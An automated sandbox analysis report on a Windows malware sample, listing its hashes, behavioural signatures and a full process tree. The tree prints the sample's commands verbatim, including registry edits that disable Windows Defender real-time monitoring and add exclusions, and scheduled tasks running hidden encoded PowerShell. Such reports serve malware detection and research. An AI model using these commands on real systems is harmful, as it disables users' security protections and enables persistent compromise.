Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 21:40

General

  • Target

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe

  • Size

    7.3MB

  • MD5

    83dbe0cb14f889e38fc0f8889842cf9d

  • SHA1

    ded313ca908136000fd9e5f623dcf0974e2b5f30

  • SHA256

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff

  • SHA512

    ad4bef13d8b816dc81b42e0a2983cedd8c1b66bb15ffff93d908dd8bb78621c2ec690c44dc01bffb3a378159c42c7552ebd27bdb889eb13351a85a26d61fbac6

  • SSDEEP

    196608:91O0G+ffRqHIxpuBM9lsB1veokOefmev7+RND:3OL+ffRqoxpAQi0POcmez+LD

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
    "C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Users\Admin\AppData\Local\Temp\7zS55CE.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2164
      • C:\Users\Admin\AppData\Local\Temp\7zS585D.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2540
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2576
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              6⤵
                PID:2648
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2548
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                  PID:2604
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                    PID:3028
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gWGSDLrCT" /SC once /ST 00:13:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1404
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gWGSDLrCT"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2424
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /DELETE /F /TN "gWGSDLrCT"
                4⤵
                  PID:2588
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe\" q8 /site_id 525403 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:808
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {4CED6223-CE88-4918-A112-BA1C9187848E} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
            1⤵
              PID:1820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1080
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2988
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:552
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:2008
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:944
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:2680
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2224
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:2228
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2744
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {5CF3396A-DB5F-4990-A0FB-252AA97BC74B} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                          PID:2092
                          • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe
                            C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\GNzryCD.exe q8 /site_id 525403 /S
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            PID:2040
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gbpFXpAuK" /SC once /ST 18:15:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:868
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gbpFXpAuK"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1244
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gbpFXpAuK"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2200
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                              3⤵
                                PID:2284
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  4⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • System Location Discovery: System Language Discovery
                                  PID:1872
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                3⤵
                                  PID:1060
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • System Location Discovery: System Language Discovery
                                    PID:2276
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "ggPFTQqmF" /SC once /ST 11:56:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2388
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "ggPFTQqmF"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2248
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "ggPFTQqmF"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1900
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:1192
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:1600
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1100
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:2980
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:2624
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1080
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2076
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1076
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\tLuvxbcI\ByueSfwTiIlafwvu.wsf"
                                      3⤵
                                        PID:1072
                                      • C:\Windows\SysWOW64\wscript.exe
                                        wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\tLuvxbcI\ByueSfwTiIlafwvu.wsf"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        PID:2808
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2704
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1004
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2304
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2924
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2588
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:2108
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2080
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:844
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2700
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:1448
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1680
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2116
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2220
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2612
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:1960
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2688
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:2724
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2356
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:776
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1436
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2476
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:1464
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2032
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:840
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1856
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:1840
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2564
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2272
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1468
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2840
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2296
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1828
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "gpAGCfptE" /SC once /ST 11:34:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:880
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "gpAGCfptE"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1664
